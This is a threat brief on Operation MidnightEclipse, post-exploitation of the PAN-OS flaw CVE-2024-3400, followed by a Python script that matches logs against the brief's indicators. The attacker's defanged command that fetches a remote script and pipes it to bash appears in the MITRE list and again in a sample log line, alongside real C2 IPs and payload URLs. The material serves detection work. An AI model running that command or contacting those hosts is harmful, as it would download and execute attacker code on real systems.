Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400 (Updated April 29)

Threat activity surrounding CVE-2024-3400 targets PAN-OS devices (GlobalProtect) with post-exploitation attempts. The operation, dubbed MidnightEclipse, includes a Python backdoor (UPSTYLE) and a cron backdoor, with mitigations, indicators, and hunting guidance provided by Unit 42 and Palo Alto Networks. #MidnightEclipse #CVE-2024-3400 #UPSTYLE #GlobalProtect #PAN-OS #Volexity

Key points

  • CVE-2024-3400 is a critical PAN-OS command injection vulnerability that can allow an unauthenticated attacker to execute code with root privileges on affected firewalls.
  • The advisory covers patches and mitigations for PAN-OS 10.2.9-h1, 11.0.4-h1, and 11.1.2-h3, plus later releases.
  • Unit 42 tracks exploitation activity under Operation MidnightEclipse, noting that most exploitation attempts failed and that some appear to have been checks to confirm the device was vulnerable rather than attempts at full compromise.
  • Post-exploitation activity observed includes a Python-based backdoor (UPSTYLE) and a cronjob backdoor used for receiving commands from an external server.
  • Exfiltration activity included copying running-config.xml to a web-accessible folder and transmitting it via HTTP requests to remote servers.
  • Indicators of compromise include specific IPs, domains, and file hashes (e.g., UPSTYLE hashes, C2 infrastructure, and hosted scripts).
  • Managed Threat Hunting queries and Threat IDs (95187, 95189, 95191) are provided to detect exploitation attempts and related activity.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – “A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.”
  • [T1059.004] Unix Shell – “the threat actor exploited CVE-2024-3400 to run commands on the firewall.”
  • [T1053.005] Cron – “cronjob backdoor to carry out their post-exploitation activities.”
  • [T1105] Ingress Tool Transfer – “update.py” backdoor hosted at 144.172.79[.]92 and related UPSTYLE deployment attempts.
  • [T1027.001] Obfuscated/Compressed Files – “Base64-decodes an embedded Python script and executes it.”
  • [T1567.002] Exfiltration Over Web Services – “copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files.”
  • [T1071.001] Web Protocols – “wget -qO- hxxp://172.233.228[.]93/patch|bash” and related HTTP-based command retrieval.
  • [T1059.006] Python – “Base64-decodes an embedded Python script and executes it” and the system.pth/payload flow.

Indicators of Compromise

  • [Hash] UPSTYLE Backdoor – 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078
  • [IP Address] C2 and download endpoints – 172.233.228.93, 66.235.168.222, and 144.172.79.92 (plus related threat IPs listed in the report)
  • [Domain] Hosted domain – nhdata.s3-us-west-2.amazonaws.com
  • [URL] Command and data exchange URLs – http://172.233.228.93/patch, http://172.233.228.93/policy, and update.py hosted at 144.172.79.92/update.py
  • [Filename] Backdoor and payload artifacts – system.pth, bootstrap.min.css, sslvpn_ngx_error.log
  • [IP] Additional exploratory indicators – 110.47.250.103, 126.227.76.24, 38.207.148.123, 147.45.70.100, 199.119.206.28 (and related list of observed probing IPs)
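The indicators above are most useful when they can be matched against device and proxy telemetry in bulk. The following is an added example (not code from Unit 42 or Palo Alto Networks) that loads the hashes, IPs, domain, URLs and filenames listed in this brief into a small matcher and runs it over a handful of constructed log lines. It refangs `hxxp://` and `[.]` notation before matching, because the brief (and many ticket notes) quote the URLs in defanged form, and it flags filename hits separately since names like `bootstrap.min.css` are common on unrelated systems and are low-confidence on their own. The log format and the `scan`/`match_line` function names are assumptions made for this example.

```python
"""Match log lines against the MidnightEclipse indicators listed in the brief."""
import re
from typing import Iterable

# Indicators copied from the Indicators of Compromise list above.
HASHES = {
    "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac",
    "5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078",
}
IPS = {
    "172.233.228.93", "66.235.168.222", "144.172.79.92",
    "110.47.250.103", "126.227.76.24", "38.207.148.123",
    "147.45.70.100", "199.119.206.28",
}
DOMAINS = {"nhdata.s3-us-west-2.amazonaws.com"}
URLS = {
    "http://172.233.228.93/patch",
    "http://172.233.228.93/policy",
    "http://144.172.79.92/update.py",
}
# Filename hits are low-confidence: these names also occur on clean systems.
FILENAMES = {"system.pth", "bootstrap.min.css", "sslvpn_ngx_error.log"}

SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"'<>|]+", re.I)


def refang(text: str) -> str:
    """Undo common defanging so that 'hxxp://1.2.3[.]4' matches '1.2.3.4'."""
    text = text.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"(?i)hxxp", "http", text)


def match_line(line: str) -> list[tuple[str, str]]:
    """Return sorted, de-duplicated (indicator_type, value) pairs found in one line."""
    text = refang(line)
    lowered = text.lower()
    hits = set()
    for h in SHA256_RE.findall(text):
        if h.lower() in HASHES:
            hits.add(("hash", h.lower()))
    for url in URL_RE.findall(text):
        if url.lower() in URLS:
            hits.add(("url", url.lower()))
    for ip in IPV4_RE.findall(text):
        if ip in IPS:
            hits.add(("ip", ip))
    for domain in DOMAINS:
        if domain in lowered:
            hits.add(("domain", domain))
    for name in FILENAMES:
        if name in lowered:
            hits.add(("filename", name))
    return sorted(hits)


def scan(lines: Iterable[str]) -> list[dict]:
    """Scan lines; return one record per line that matched at least one indicator."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = match_line(line)
        if hits:
            findings.append({"line": number, "text": line.rstrip(), "hits": hits})
    return findings


# Constructed sample log lines (not real telemetry), one per indicator type plus a benign line.
SAMPLE_LOG = [
    "2024-04-16T10:02:11Z fw01 cron: CMD (wget -qO- hxxp://172.233.228[.]93/patch|bash)",
    "2024-04-16T10:02:15Z fw01 fileop: created file system.pth",
    "2024-04-16T10:02:40Z fw01 av: sha256=5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078 verdict=unknown",
    "2024-04-16T10:02:50Z fw01 dns: query nhdata.s3-us-west-2.amazonaws.com type A",
    "2024-04-16T10:03:00Z fw01 traffic: 10.0.0.5 -> 10.0.0.9 allow",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"line {finding['line']}: {finding['hits']}")
```

Run it over real exports by replacing `SAMPLE_LOG` with the lines of a log file; a hash or C2 URL hit is worth an immediate escalation, while a filename-only hit should be correlated with the Threat IDs and hunting queries the brief points to before acting on it.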

Read more: https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh